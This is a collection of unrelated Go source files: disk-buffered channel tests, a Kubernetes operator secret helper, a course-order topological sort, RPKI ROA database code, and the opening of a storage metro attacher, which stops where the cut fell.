		src <- &MyStr{"Data_" + strconv.Itoa(i)}
	}
	close(src)
	fwd, wr, rd := d.GetStats()
	t.Logf("Pipe stats:\nDirect: %d\nWrites: %d\nReads: %d\n", fwd, wr, rd)
	// Give the background goroutines time to settle before inspecting disk.
	time.Sleep(sleepTime*3)
	t.Logf("Disk has '%d' records", d.ldbQueue.Length())
	if d.ldbQueue.Length() > 0 {
		t.Fatalf("'%d' messages got back-sucked after src close", d.ldbQueue.Length())
	}
	gotnum := suck(t, sink)
	t.Logf("Got %d/%d", gotnum, iters)
	if gotnum != iters {
		t.Fatalf("Expected %d items, got %d", iters, gotnum)
	}
}
// TestDiskBufferedChan_SourceCloseHalfBufferedSink is the half-capacity
// variant: some items may legitimately stay on disk, but all must arrive.
func TestDiskBufferedChan_SourceCloseHalfBufferedSink(t *testing.T) {
	os.RemoveAll(dbDirectory)
	d, src, sink, _ := prepChan(t, 0, iters/2, DecMyStr)
	defer d.Close()
	for i := 1; i <= iters; i++ {
		src <- &MyStr{"Data_" + strconv.Itoa(i)}
	}
	close(src)
	fwd, wr, rd := d.GetStats()
	t.Logf("Pipe stats:\nDirect: %d\nWrites: %d\nReads: %d\n", fwd, wr, rd)
	// Let the pump settle; no assertion on the disk count here, by design.
	time.Sleep(sleepTime*3)
	t.Logf("Disk has '%d' records", d.ldbQueue.Length())
	gotnum := suck(t, sink)
	t.Logf("Got %d/%d", gotnum, iters)
	if gotnum != iters {
		t.Fatalf("Expected %d items, got %d", iters, gotnum)
	}
}
// TestDiskBufferedChan_Consistency streams random ints through the pipe with a
// concurrent producer and consumer, then compares checksums of both sides.
// The sums are only read after wg.Wait(), which establishes the necessary
// happens-before edge for the two goroutine-local accumulators.
func TestDiskBufferedChan_Consistency(t *testing.T) {
	os.RemoveAll(dbDirectory)
	d, src, sink, _ := prepChan(t, 0, 0, DecMyInt)
	defer d.Close()
	var wg sync.WaitGroup
	wg.Add(2)
	var sum_src = 0
	go func() {
		defer wg.Done()
		for i := 1; i <= iters; i++ {
			num := int(rand.Int31())
			src <- &MyInt{num}
			sum_src += num
		}
	}()
	var sum_sink = 0
	go func() {
		defer wg.Done()
		for i := 1; i <= iters; i++ {
			data := <-sink
			sum_sink += data.(*MyInt).Data
		}
	}()
	wg.Wait()
	fwd, wr, rd := d.GetStats()
	t.Logf("Pipe stats:\nDirect: %d\nWrites: %d\nReads: %d\n", fwd, wr, rd)
	t.Logf("Summs: %d/%d", sum_src, sum_sink)
	if sum_src != sum_sink {
		t.Fatalf("Summs mismatch: %d/%d", sum_src, sum_sink)
	}
}
// BenchmarkDiskBufferedChan_FWD measures the direct-forward path: each item is
// sent and immediately received, so the disk queue should rarely be touched.
func BenchmarkDiskBufferedChan_FWD(b *testing.B) {
	os.RemoveAll(dbDirectory)
	src := make(chan interface{})
	dbch, sink, err := NewDiskBufferedChan(dbDirectory, 0, DecMyStr, src)
	if err != nil {
		b.Fatalf("Error: %s", err)
	}
	b.ResetTimer()
	for i := 0; i < b.N; i++ {
		src <- &MyStr{strconv.Itoa(i)}
		<-sink
	}
	b.StopTimer()
	fwd, wr, rd := dbch.GetStats()
	b.Logf("Pipe stats:\nDirect: %d\nWrites: %d\nReads: %d\n", fwd, wr, rd)
	dbch.Close()
}
// BenchmarkDiskBufferedChan_DiskRnW measures the disk round-trip path: all
// items are produced first (forcing spill to disk), then consumed.
func BenchmarkDiskBufferedChan_DiskRnW(b *testing.B) {
	os.RemoveAll(dbDirectory)
	src := make(chan interface{})
	dbch, sink, err := NewDiskBufferedChan(dbDirectory, 0, DecMyStr, src)
	if err != nil {
		b.Fatalf("Error: %s", err)
	}
	b.ResetTimer()
	for i := 0; i < b.N; i++ {
		src <- &MyStr{strconv.Itoa(i)}
	}
	close(src)
	for i := 0; i < b.N; i++ {
		<-sink
	}
	b.StopTimer()
	fwd, wr, rd := dbch.GetStats()
	b.Logf("Pipe stats:\nDirect: %d\nWrites: %d\nReads: %d\n", fwd, wr, rd)
	dbch.Close()
}
// testLogger adapts a *testing.T to a leveled-logger interface so that
// library log output is routed through the test runner.
type testLogger struct {
	testing *testing.T
}

// Debug logs at debug level via t.Log.
func (l *testLogger) Debug(args ...interface{}) {
	l.testing.Log(args...)
}

// Debugf logs a formatted debug message via t.Logf.
func (l *testLogger) Debugf(format string, args ...interface{}) {
	l.testing.Logf(format, args...)
}

// Info logs at info level via t.Log.
func (l *testLogger) Info(args ...interface{}) {
	l.testing.Log(args...)
}

// Infof logs a formatted info message via t.Logf.
func (l *testLogger) Infof(format string, args ...interface{}) {
	l.testing.Logf(format, args...)
}

// Warn logs at warning level via t.Log.
func (l *testLogger) Warn(args ...interface{}) {
	l.testing.Log(args...)
}

// Warnf logs a formatted warning via t.Logf.
func (l *testLogger) Warnf(format string, args ...interface{}) {
	l.testing.Logf(format, args...)
}

// Error logs at error level AND marks the test failed (t.Error).
func (l *testLogger) Error(args ...interface{}) {
	l.testing.Error(args...)
}

// Errorf logs a formatted error AND marks the test failed (t.Errorf).
func (l *testLogger) Errorf(format string, args ...interface{}) {
	l.testing.Errorf(format, args...)
}
|
package database
import (
"context"
"io/ioutil"
"os"
kciv1alpha1 "github.com/kloeckner-i/db-operator/pkg/apis/kci/v1alpha1"
"github.com/kloeckner-i/db-operator/pkg/utils/kci"
"github.com/sirupsen/logrus"
k8serrors "k8s.io/apimachinery/pkg/api/errors"
)
// createInstanceAccessSecret creates (or updates) a Kubernetes secret in the
// Database resource's namespace containing the Google Cloud SQL client
// credentials file, so workloads can reach the instance. It is a no-op for
// non-"google" backends. The credentials file path is taken from the
// GCSQL_CLIENT_CREDENTIALS environment variable of the operator process.
func (r *ReconcileDatabase) createInstanceAccessSecret(dbcr *kciv1alpha1.Database) error {
	if backend, _ := dbcr.GetBackendType(); backend != "google" {
		logrus.Debugf("DB: namespace=%s, name=%s %s doesn't need instance access secret skipping...", dbcr.Namespace, dbcr.Name, backend)
		return nil
	}
	data, err := ioutil.ReadFile(os.Getenv("GCSQL_CLIENT_CREDENTIALS"))
	if err != nil {
		return err
	}
	newName := GCSQLClientSecretName
	secretData := make(map[string][]byte)
	secretData["credentials.json"] = data
	newSecret := kci.SecretBuilder(newName, dbcr.GetNamespace(), secretData)
	err = r.client.Create(context.TODO(), newSecret)
	if err != nil {
		if k8serrors.IsAlreadyExists(err) {
			// if the secret resource already exists, update it
			err = r.client.Update(context.TODO(), newSecret)
			if err != nil {
				logrus.Errorf("DB: namespace=%s, name=%s failed updating instance access secret", dbcr.Namespace, dbcr.Name)
				return err
			}
		} else {
			logrus.Errorf("DB: namespace=%s, name=%s failed creating instance access secret - %s", dbcr.Namespace, dbcr.Name, err)
			return err
		}
	}
	// NOTE(review): "created" is logged even on the update path above.
	logrus.Infof("DB: namespace=%s, name=%s instance access secret created", dbcr.Namespace, dbcr.Name)
	return nil
}
|
package main
import "sync"
// main acquires a mutex once and exits; the zero value of sync.Mutex is
// ready to use, so no pointer or constructor is needed.
func main() {
	var mu sync.Mutex
	mu.Lock()
}
|
/*
 * @File: models.token.go
 * @Description: Defines which error information is returned to clients
 * @Author: Carlos Henrique Lemos (chenriquelemos@gmail.com)
 */
package models
// Error is the error payload returned to API clients.
// JSON field names and example tags are intentionally in Portuguese.
type Error struct {
	// Code is the application-specific error code.
	Code int `json:"código" exemplo:"27"`
	// Message is the human-readable error description.
	Message string `json:"mensagem" exemplo:"Mensagem de Erro"`
}
|
package main
import "fmt"
// intSet is a set of ints backed by a map. The size field mirrors the
// element count (kept for callers that read it directly).
type intSet struct {
	size     int
	elements map[int]struct{}
}

// NewIntSet returns an empty, ready-to-use intSet.
func NewIntSet() intSet {
	return intSet{size: 0, elements: make(map[int]struct{})}
}

// Add inserts elem into the set; adding an existing element is a no-op.
// (Removed the redundant bare `return` the original carried.)
func (s *intSet) Add(elem int) {
	if _, exists := s.elements[elem]; !exists {
		s.elements[elem] = struct{}{}
		s.size++
	}
}

// Remove deletes elem from the set if present; otherwise a no-op.
func (s *intSet) Remove(elem int) {
	if _, exists := s.elements[elem]; exists {
		delete(s.elements, elem)
		s.size--
	}
}

// Contains reports whether elem is a member of the set.
func (s *intSet) Contains(elem int) bool {
	_, exists := s.elements[elem]
	return exists
}

// GetAnyElement returns an arbitrary element of the set, or an error when
// the set is empty. Map iteration order is random, so the element returned
// is unspecified when the set has more than one member.
func (s *intSet) GetAnyElement() (int, error) {
	if len(s.elements) == 0 {
		return 0, fmt.Errorf("set is empty")
	}
	for k := range s.elements {
		return k, nil
	}
	return 0, nil // unreachable: the map is non-empty
}
// Return true if cycle exists.
func checkCycleFrom(start int, adjs [][]int, whiteSet, graySet, blackSet intSet) bool {
if blackSet.Contains(start) {
return false
}
if graySet.Contains(start) {
return true
}
if whiteSet.Contains(start) {
whiteSet.Remove(start)
graySet.Add(start)
}
// Explore all adjacencies
for i := 0; i < len(adjs[start]); i++ {
cycleExists := checkCycleFrom(adjs[start][i], adjs, whiteSet, graySet, blackSet)
if cycleExists {
return true
}
}
graySet.Remove(start)
blackSet.Add(start)
return false
}
// checkCycle reports whether the directed graph given as adjacency lists
// contains any cycle, by running a colored DFS from every still-white node.
func checkCycle(adjs [][]int) bool {
	whiteSet, graySet, blackSet := NewIntSet(), NewIntSet(), NewIntSet()
	// All vertices start out white (unvisited).
	for vertex := range adjs {
		whiteSet.Add(vertex)
	}
	for {
		vertex, err := whiteSet.GetAnyElement()
		if err != nil {
			// No white vertices left: every component was explored cycle-free.
			return false
		}
		if checkCycleFrom(vertex, adjs, whiteSet, graySet, blackSet) {
			return true
		}
	}
}
// topologicalTraversal appends a post-order DFS from start onto traversal,
// skipping nodes already in visited, and returns the extended slice.
// Dependencies (adjacencies) therefore appear before the nodes that need them.
func topologicalTraversal(start int, adjs [][]int, visited map[int]struct{}, traversal []int) []int {
	if _, done := visited[start]; done {
		return traversal
	}
	for _, next := range adjs[start] {
		traversal = topologicalTraversal(next, adjs, visited, traversal)
	}
	visited[start] = struct{}{}
	return append(traversal, start)
}
// findOrder returns one valid order in which to take numCourses courses,
// given prerequisite pairs [course, prereq]. It returns an empty slice when
// the prerequisite graph contains a cycle or cannot be fully ordered.
func findOrder(numCourses int, prerequisites [][]int) []int {
	adjs := make([][]int, numCourses)
	for i := range adjs { // idiomatic: was `for i, _ := range`
		adjs[i] = []int{}
	}
	visited := make(map[int]struct{})
	// leafCheck[i] stays true while no other course depends on course i.
	leafCheck := make([]bool, numCourses)
	for i := range leafCheck {
		leafCheck[i] = true
	}
	for _, pair := range prerequisites {
		from, to := pair[0], pair[1]
		adjs[from] = append(adjs[from], to)
		leafCheck[to] = false
	}
	if checkCycle(adjs) {
		return []int{}
	}
	order := []int{}
	for i := 0; i < numCourses; i++ {
		if leafCheck[i] {
			// leaf course - this is a course that no other course depends on
			order = topologicalTraversal(i, adjs, visited, order)
		}
	}
	// Any unvisited course was unreachable from every leaf, so the partial
	// order produced above is not a complete answer.
	for i := 0; i < numCourses; i++ {
		if _, exists := visited[i]; !exists {
			return []int{}
		}
	}
	return order
}
// testcase pairs a course count with its prerequisite edge list for tests().
type testcase struct {
	// numCourses is the total number of courses (vertices).
	numCourses int
	// preReqs holds [course, prerequisite] pairs (directed edges).
	preReqs [][]int
}
// tests runs findOrder over a few fixed graphs (the last one cyclic) and
// prints each resulting order for manual inspection.
func tests() {
	cases := []testcase{
		{numCourses: 2, preReqs: [][]int{{1, 0}}},
		{numCourses: 4, preReqs: [][]int{{1, 0}, {2, 0}, {3, 1}, {3, 2}}},
		{numCourses: 3, preReqs: [][]int{{0, 2}, {1, 2}, {2, 0}}},
	}
	for i, tc := range cases {
		fmt.Printf("Test case: %d; order: %v\n", i, findOrder(tc.numCourses, tc.preReqs))
	}
}
// main does a quick manual sanity check of intSet; the fuller exercise
// lives in tests() and is left commented out.
func main() {
	// tests()
	set := NewIntSet()
	set.Add(4)
	fmt.Printf("s1.size = %d\n", set.size)
}
|
package parsevalidate
import (
"errors"
"sync"
"time"
"github.com/cpusoft/goutil/belogs"
"github.com/cpusoft/goutil/jsonutil"
"github.com/cpusoft/goutil/xormdb"
model "rpstir2-model"
"xorm.io/xorm"
)
// add
// addRoasDb inserts a batch of ROA files and updates their sync-log file
// records, all inside one transaction; any failure rolls everything back.
func addRoasDb(syncLogFileModels []SyncLogFileModel) error {
	belogs.Info("addRoasDb(): will insert len(syncLogFileModels):", len(syncLogFileModels))
	session, err := xormdb.NewSession()
	if err != nil {
		return err
	}
	defer session.Close()
	start := time.Now()
	belogs.Debug("addRoasDb(): len(syncLogFileModels):", len(syncLogFileModels))
	// insert new roa
	for i := range syncLogFileModels {
		err = insertRoaDb(session, &syncLogFileModels[i], start)
		if err != nil {
			belogs.Error("addRoasDb(): insertRoaDb fail:", jsonutil.MarshalJson(syncLogFileModels[i]), err)
			return xormdb.RollbackAndLogError(session, "addRoasDb(): insertRoaDb fail: "+jsonutil.MarshalJson(syncLogFileModels[i]), err)
		}
	}
	// Mark the corresponding sync-log file rows as processed.
	err = updateSyncLogFilesJsonAllAndStateDb(session, syncLogFileModels)
	if err != nil {
		belogs.Error("addRoasDb(): updateSyncLogFilesJsonAllAndStateDb fail:", err)
		return xormdb.RollbackAndLogError(session, "addRoasDb(): updateSyncLogFilesJsonAllAndStateDb fail ", err)
	}
	err = xormdb.CommitSession(session)
	if err != nil {
		belogs.Error("addRoasDb(): CommitSession fail :", err)
		return err
	}
	belogs.Info("addRoasDb(): len(syncLogFileModels):", len(syncLogFileModels), " time(s):", time.Since(start))
	return nil
}
// addRoaDb inserts a single ROA file and updates its sync-log file record
// within one transaction; any failure rolls the transaction back.
func addRoaDb(syncLogFileModel *SyncLogFileModel) (err error) {
	start := time.Now()
	belogs.Debug("addRoaDb(): will add roa file:", syncLogFileModel.FilePath, syncLogFileModel.FileName,
		" fileType:", syncLogFileModel.FileType)
	session, err := xormdb.NewSession()
	if err != nil {
		// Fix: this error was previously discarded; deferring Close and using
		// a nil session would panic. Matches the check done in addRoasDb().
		belogs.Error("addRoaDb(): NewSession fail :", err)
		return err
	}
	defer session.Close()
	err = insertRoaDb(session, syncLogFileModel, start)
	if err != nil {
		belogs.Error("addRoaDb(): insertRoaDb fail, syncLogFileModel:", jsonutil.MarshalJson(syncLogFileModel), err)
		return xormdb.RollbackAndLogError(session, "addRoaDb(): insertRoaDb fail, syncLogFileModel:"+jsonutil.MarshalJson(syncLogFileModel), err)
	}
	err = updateSyncLogFileJsonAllAndStateDb(session, syncLogFileModel)
	if err != nil {
		belogs.Error("addRoaDb(): updateSyncLogFileJsonAllAndStateDb fail, syncLogFileModel:", jsonutil.MarshalJson(syncLogFileModel), err)
		return xormdb.RollbackAndLogError(session, "addRoaDb(): updateSyncLogFileJsonAllAndStateDb fail, syncLogFileModel:"+jsonutil.MarshalJson(syncLogFileModel), err)
	}
	err = xormdb.CommitSession(session)
	if err != nil {
		belogs.Error("addRoaDb(): CommitSession fail :", err)
		return err
	}
	belogs.Info("addRoaDb(): roa file:", syncLogFileModel.FilePath, syncLogFileModel.FileName, " time(s):", time.Since(start))
	return nil
}
// del
// delRoasDb deletes the ROAs referenced by both the del and update batches in
// one transaction, then updates sync-log state for the del batch only
// (updated files get their state written by the subsequent re-add).
// Signals completion on wg; intended to run as a goroutine.
func delRoasDb(delSyncLogFileModels []SyncLogFileModel, updateSyncLogFileModels []SyncLogFileModel, wg *sync.WaitGroup) (err error) {
	defer func() {
		wg.Done()
	}()
	start := time.Now()
	session, err := xormdb.NewSession()
	if err != nil {
		return err
	}
	defer session.Close()
	syncLogFileModels := append(delSyncLogFileModels, updateSyncLogFileModels...)
	belogs.Info("delRoasDb(): will del len(syncLogFileModels):", len(syncLogFileModels))
	for i := range syncLogFileModels {
		err = delRoaByIdDb(session, syncLogFileModels[i].CertId)
		if err != nil {
			belogs.Error("delRoasDb(): delRoaByIdDb fail, cerId:", syncLogFileModels[i].CertId, err)
			return xormdb.RollbackAndLogError(session, "delRoasDb(): delRoaByIdDb fail: "+jsonutil.MarshalJson(syncLogFileModels[i]), err)
		}
	}
	// only update delSyncLogFileModels
	err = updateSyncLogFilesJsonAllAndStateDb(session, delSyncLogFileModels)
	if err != nil {
		belogs.Error("delRoasDb(): updateSyncLogFilesJsonAllAndStateDb fail:", err)
		return xormdb.RollbackAndLogError(session, "delRoasDb(): updateSyncLogFilesJsonAllAndStateDb fail", err)
	}
	err = xormdb.CommitSession(session)
	if err != nil {
		belogs.Error("delRoasDb(): CommitSession fail :", err)
		return err
	}
	belogs.Info("delRoasDb(): len(roas), ", len(syncLogFileModels), " time(s):", time.Since(start))
	return nil
}
// delRoaDb deletes a single ROA (and its child rows) in one transaction.
// When SyncType is "del" it also updates the sync-log file record here;
// for add/update the record is updated later by addRoaDb().
func delRoaDb(syncLogFileModel *SyncLogFileModel) (err error) {
	start := time.Now()
	belogs.Debug("delRoaDb(): will del roa file:", syncLogFileModel.FilePath, syncLogFileModel.FileName)
	session, err := xormdb.NewSession()
	if err != nil {
		// Fix: this error was previously discarded; deferring Close and using
		// a nil session would panic. Matches the check done in delRoasDb().
		belogs.Error("delRoaDb(): NewSession fail :", err)
		return err
	}
	defer session.Close()
	err = delRoaByIdDb(session, syncLogFileModel.CertId)
	if err != nil {
		belogs.Error("delRoaDb(): delRoaByIdDb fail, syncLogFileModel:", jsonutil.MarshalJson(syncLogFileModel), err)
		return xormdb.RollbackAndLogError(session, "delRoaDb(): delRoaByIdDb fail, syncLogFileModel:"+jsonutil.MarshalJson(syncLogFileModel), err)
	}
	// only del,will update syncLogFile.
	// when is add/update, will update syncLogFile in addAsaDb()
	if syncLogFileModel.SyncType == "del" {
		err = updateSyncLogFileJsonAllAndStateDb(session, syncLogFileModel)
		if err != nil {
			belogs.Error("delRoaDb(): updateSyncLogFileJsonAllAndStateDb fail, syncLogFileModel:", jsonutil.MarshalJson(syncLogFileModel), err)
			return xormdb.RollbackAndLogError(session, "delRoaDb(): updateSyncLogFileJsonAllAndStateDb fail, syncLogFileModel:"+jsonutil.MarshalJson(syncLogFileModel), err)
		}
	}
	err = xormdb.CommitSession(session)
	if err != nil {
		belogs.Error("delRoaDb(): CommitSession fail :", err)
		return err
	}
	belogs.Info("delRoaDb(): roa file:", syncLogFileModel.FilePath, syncLogFileModel.FileName, " time(s):", time.Since(start))
	return nil
}
// delRoaByIdDb deletes the lab_rpki_roa row with the given id together with
// all of its child rows (ipaddress, ee_ipaddress, sia, aia), using the
// caller's session/transaction.
func delRoaByIdDb(session *xorm.Session, roaId uint64) (err error) {
	belogs.Debug("delRoaByIdDb():delete lab_rpki_roa by roaId:", roaId)
	// rrdp may have id==0, just return nil
	// Fix: roaId is unsigned, so the old "<= 0" comparison was misleading
	// (it could only ever match zero); use an explicit equality test.
	if roaId == 0 {
		return nil
	}
	belogs.Info("delRoaByIdDb():delete lab_rpki_roa by roaId, more than 0:", roaId)
	//lab_rpki_roa_ipaddress
	res, err := session.Exec("delete from lab_rpki_roa_ipaddress where roaId = ?", roaId)
	if err != nil {
		belogs.Error("delRoaByIdDb():delete from lab_rpki_roa_ipaddress fail: roaId: ", roaId, err)
		return err
	}
	count, _ := res.RowsAffected()
	belogs.Debug("delRoaByIdDb():delete lab_rpki_roa_ipaddress by roaId:", roaId, " count:", count)
	//lab_rpki_roa_ee_ipaddress
	res, err = session.Exec("delete from lab_rpki_roa_ee_ipaddress where roaId = ?", roaId)
	if err != nil {
		belogs.Error("delRoaByIdDb():delete from lab_rpki_roa_ee_ipaddress fail: roaId: ", roaId, err)
		return err
	}
	count, _ = res.RowsAffected()
	belogs.Debug("delRoaByIdDb():delete lab_rpki_roa_ee_ipaddress by roaId:", roaId, " count:", count)
	//lab_rpki_roa_sia
	res, err = session.Exec("delete from lab_rpki_roa_sia where roaId = ?", roaId)
	if err != nil {
		belogs.Error("delRoaByIdDb():delete from lab_rpki_roa_sia fail: roaId: ", roaId, err)
		return err
	}
	count, _ = res.RowsAffected()
	belogs.Debug("delRoaByIdDb():delete lab_rpki_roa_sia by roaId:", roaId, " count:", count)
	//lab_rpki_roa_aia (comment previously said _sia by mistake)
	res, err = session.Exec("delete from lab_rpki_roa_aia where roaId = ?", roaId)
	if err != nil {
		belogs.Error("delRoaByIdDb():delete from lab_rpki_roa_aia fail: roaId: ", roaId, err)
		return err
	}
	count, _ = res.RowsAffected()
	belogs.Debug("delRoaByIdDb():delete lab_rpki_roa_aia by roaId:", roaId, " count:", count)
	//lab_rpki_roa: delete the parent row last.
	res, err = session.Exec("delete from lab_rpki_roa where id = ?", roaId)
	if err != nil {
		belogs.Error("delRoaByIdDb():delete from lab_rpki_roa fail: roaId: ", roaId, err)
		return err
	}
	count, _ = res.RowsAffected()
	belogs.Debug("delRoaByIdDb():delete lab_rpki_roa by roaId:", roaId, " count:", count)
	return nil
}
// insertRoaDb inserts one ROA and all of its child rows (aia, sia,
// ipaddress, ee_ipaddress) into the database using the caller's
// session/transaction. `now` is used as the row's updateTime. The
// SyncLogFileModel's CertModel must be a model.RoaModel (by value).
func insertRoaDb(session *xorm.Session,
	syncLogFileModel *SyncLogFileModel, now time.Time) error {
	roaModel, ok := syncLogFileModel.CertModel.(model.RoaModel)
	if !ok {
		belogs.Error("insertRoaDb(): is not roaModel, syncLogFileModel:", jsonutil.MarshalJson(syncLogFileModel))
		return errors.New("CertModel is not roaModel type")
	}
	//lab_rpki_roa
	sqlStr := `INSERT lab_rpki_roa(
	asn, ski, aki, filePath,fileName,
	fileHash,jsonAll,syncLogId, syncLogFileId, updateTime,
	state)
	VALUES(?,?,?,?,?,
	?,?,?,?,?,
	?)`
	res, err := session.Exec(sqlStr,
		roaModel.Asn, xormdb.SqlNullString(roaModel.Ski), xormdb.SqlNullString(roaModel.Aki), roaModel.FilePath, roaModel.FileName,
		roaModel.FileHash, xormdb.SqlNullString(jsonutil.MarshalJson(roaModel)), syncLogFileModel.SyncLogId, syncLogFileModel.Id, now,
		xormdb.SqlNullString(jsonutil.MarshalJson(syncLogFileModel.StateModel)))
	if err != nil {
		belogs.Error("insertRoaDb(): INSERT lab_rpki_roa Exec :", jsonutil.MarshalJson(syncLogFileModel), err)
		return err
	}
	// Child rows below all reference this auto-generated parent id.
	roaId, err := res.LastInsertId()
	if err != nil {
		belogs.Error("insertRoaDb(): LastInsertId :", jsonutil.MarshalJson(syncLogFileModel), err)
		return err
	}
	//lab_rpki_roa_aia (only when a CA issuers URI is present)
	belogs.Debug("insertRoaDb(): roaModel.Aia.CaIssuers:", roaModel.AiaModel.CaIssuers)
	if len(roaModel.AiaModel.CaIssuers) > 0 {
		sqlStr = `INSERT lab_rpki_roa_aia(roaId, caIssuers)
				VALUES(?,?)`
		res, err = session.Exec(sqlStr, roaId, roaModel.AiaModel.CaIssuers)
		if err != nil {
			belogs.Error("insertRoaDb(): INSERT lab_rpki_roa_aia Exec :", jsonutil.MarshalJson(syncLogFileModel), err)
			return err
		}
	}
	//lab_rpki_roa_sia (only when at least one SIA URI is present)
	belogs.Debug("insertRoaDb(): roaModel.Sia:", roaModel.SiaModel)
	if len(roaModel.SiaModel.CaRepository) > 0 ||
		len(roaModel.SiaModel.RpkiManifest) > 0 ||
		len(roaModel.SiaModel.RpkiNotify) > 0 ||
		len(roaModel.SiaModel.SignedObject) > 0 {
		sqlStr = `INSERT lab_rpki_roa_sia(roaId, rpkiManifest,rpkiNotify,caRepository,signedObject)
				VALUES(?,?,?,?,?)`
		res, err = session.Exec(sqlStr, roaId, roaModel.SiaModel.RpkiManifest,
			roaModel.SiaModel.RpkiNotify, roaModel.SiaModel.CaRepository,
			roaModel.SiaModel.SignedObject)
		if err != nil {
			belogs.Error("insertRoaDb(): INSERT lab_rpki_roa_sia Exec :", jsonutil.MarshalJson(syncLogFileModel), err)
			return err
		}
	}
	//lab_rpki_roa_ipaddress: one row per announced prefix.
	belogs.Debug("insertRoaDb(): roaModel.IPAddrBlocks:", jsonutil.MarshalJson(roaModel.RoaIpAddressModels))
	if roaModel.RoaIpAddressModels != nil && len(roaModel.RoaIpAddressModels) > 0 {
		sqlStr = `INSERT lab_rpki_roa_ipaddress(roaId, addressFamily,addressPrefix,maxLength, rangeStart, rangeEnd,addressPrefixRange )
				VALUES(?,?,?,?,?,?,?)`
		for _, roaIpAddressModel := range roaModel.RoaIpAddressModels {
			res, err = session.Exec(sqlStr, roaId, roaIpAddressModel.AddressFamily,
				roaIpAddressModel.AddressPrefix, roaIpAddressModel.MaxLength,
				roaIpAddressModel.RangeStart, roaIpAddressModel.RangeEnd, roaIpAddressModel.AddressPrefixRange)
			if err != nil {
				belogs.Error("insertRoaDb(): INSERT lab_rpki_roa_ipaddress Exec :", jsonutil.MarshalJson(syncLogFileModel), err)
				return err
			}
		}
	}
	//lab_rpki_roa_ee_ipaddress: one row per EE certificate IP address.
	belogs.Debug("insertRoaDb(): roaModel.CerIpAddressModel:", roaModel.EeCertModel.CerIpAddressModel)
	sqlStr = `INSERT lab_rpki_roa_ee_ipaddress(roaId,addressFamily, addressPrefix,min,max,
	                rangeStart,rangeEnd,addressPrefixRange) 
				 VALUES(?,?,?,?,?,
				 ?,?,?)`
	for _, cerIpAddress := range roaModel.EeCertModel.CerIpAddressModel.CerIpAddresses {
		res, err = session.Exec(sqlStr,
			roaId, cerIpAddress.AddressFamily, cerIpAddress.AddressPrefix, cerIpAddress.Min, cerIpAddress.Max,
			cerIpAddress.RangeStart, cerIpAddress.RangeEnd, cerIpAddress.AddressPrefixRange)
		if err != nil {
			belogs.Error("insertRoaDb(): INSERT lab_rpki_roa_ee_ipaddress Exec:", jsonutil.MarshalJson(syncLogFileModel), err)
			return err
		}
	}
	return nil
}
// getExpireRoaDb returns the id/state of every ROA whose EE certificate
// notAfter timestamp (stored inside the jsonAll JSON column) is earlier than
// `now`. The comparison is done on the string form, so `now` is rendered in
// the same RFC3339-like layout the column uses.
func getExpireRoaDb(now time.Time) (certIdStateModels []CertIdStateModel, err error) {
	certIdStateModels = make([]CertIdStateModel, 0)
	t := now.Local().Format("2006-01-02T15:04:05-0700")
	// Strip the "+zone" suffix before parsing so str_to_date gets a clean value.
	sql := `select id, state as stateStr,str_to_date( SUBSTRING_INDEX(c.jsonAll->>'$.eeCertModel.notAfter','+',1),'%Y-%m-%dT%H:%i:%S') as endTime from  lab_rpki_roa c 
			where c.jsonAll->>'$.eeCertModel.notAfter' < ? order by id `
	err = xormdb.XormEngine.SQL(sql, t).Find(&certIdStateModels)
	if err != nil {
		belogs.Error("getExpireRoaDb(): lab_rpki_roa fail:", t, err)
		return nil, err
	}
	belogs.Info("getExpireRoaDb(): now t:", t, "  , len(certIdStateModels):", len(certIdStateModels))
	return certIdStateModels, nil
}
// updateRoaStateDb writes the new state string of each ROA back to
// lab_rpki_roa inside one transaction; any failure rolls it back.
func updateRoaStateDb(certIdStateModels []CertIdStateModel) error {
	start := time.Now()
	session, err := xormdb.NewSession()
	if err != nil {
		// Fix: this error was previously discarded; deferring Close and using
		// a nil session would panic. Matches the check done in addRoasDb().
		belogs.Error("updateRoaStateDb(): NewSession fail :", err)
		return err
	}
	defer session.Close()
	sql := `update lab_rpki_roa c set c.state = ? where id = ? `
	for i := range certIdStateModels {
		belogs.Debug("updateRoaStateDb(): certIdStateModels[i]:", certIdStateModels[i].Id, certIdStateModels[i].StateStr)
		_, err := session.Exec(sql, certIdStateModels[i].StateStr, certIdStateModels[i].Id)
		if err != nil {
			belogs.Error("updateRoaStateDb(): UPDATE lab_rpki_roa fail :", jsonutil.MarshalJson(certIdStateModels[i]), err)
			return xormdb.RollbackAndLogError(session, "updateRoaStateDb(): UPDATE lab_rpki_roa fail : certIdStateModels[i]: "+
				jsonutil.MarshalJson(certIdStateModels[i]), err)
		}
	}
	err = xormdb.CommitSession(session)
	if err != nil {
		belogs.Error("updateRoaStateDb(): CommitSession fail :", err)
		return err
	}
	belogs.Info("updateRoaStateDb(): len(certIdStateModels):", len(certIdStateModels), "  time(s):", time.Since(start))
	return nil
}
|
package attacher
import (
"github.com/Huawei/eSDK_K8S_Plugin/src/utils/log"
)
// MetroAttacher fans attach/detach operations out to both halves of a
// HyperMetro (active-active) volume pair: a local and a remote attacher
// sharing one access protocol.
type MetroAttacher struct {
	// localAttacher handles the local storage array.
	localAttacher AttacherPlugin
	// remoteAttacher handles the remote (metro peer) storage array.
	remoteAttacher AttacherPlugin
	// protocol is the access protocol used for connections (e.g. iSCSI/RoCE).
	protocol string
}
// NewMetroAttacher builds a MetroAttacher that pairs the given local and
// remote attachers under one access protocol.
func NewMetroAttacher(localAttacher, remoteAttacher AttacherPlugin, protocol string) *MetroAttacher {
	attacher := new(MetroAttacher)
	attacher.localAttacher = localAttacher
	attacher.remoteAttacher = remoteAttacher
	attacher.protocol = protocol
	return attacher
}
// NodeStage connects the LUN to this node over the attacher's protocol and
// returns the resulting device path (delegates to connectVolume).
func (p *MetroAttacher) NodeStage(lunName string, parameters map[string]interface{}) (string, error) {
	return connectVolume(p, lunName, p.protocol, parameters)
}
// NodeUnstage detaches the LUN from both arrays, then disconnects the local
// device by WWN. A missing WWN is treated as best-effort cleanup (the device
// may be left over) rather than an error.
func (p *MetroAttacher) NodeUnstage(lunName string, parameters map[string]interface{}) error {
	wwn, err := p.ControllerDetach(lunName, parameters)
	if err != nil {
		return err
	}
	if wwn == "" {
		log.Warningf("Cannot get WWN of LUN %s, the dev may leftover", lunName)
		return nil
	}
	return disConnectVolume(wwn, p.protocol)
}
// ControllerAttach attaches the LUN on the remote array first, then on the
// local array, returning the local LUN WWN. If the local attach fails, the
// remote attach is rolled back.
func (p *MetroAttacher) ControllerAttach(lunName string, parameters map[string]interface{}) (string, error) {
	_, err := p.remoteAttacher.ControllerAttach(lunName, parameters)
	if err != nil {
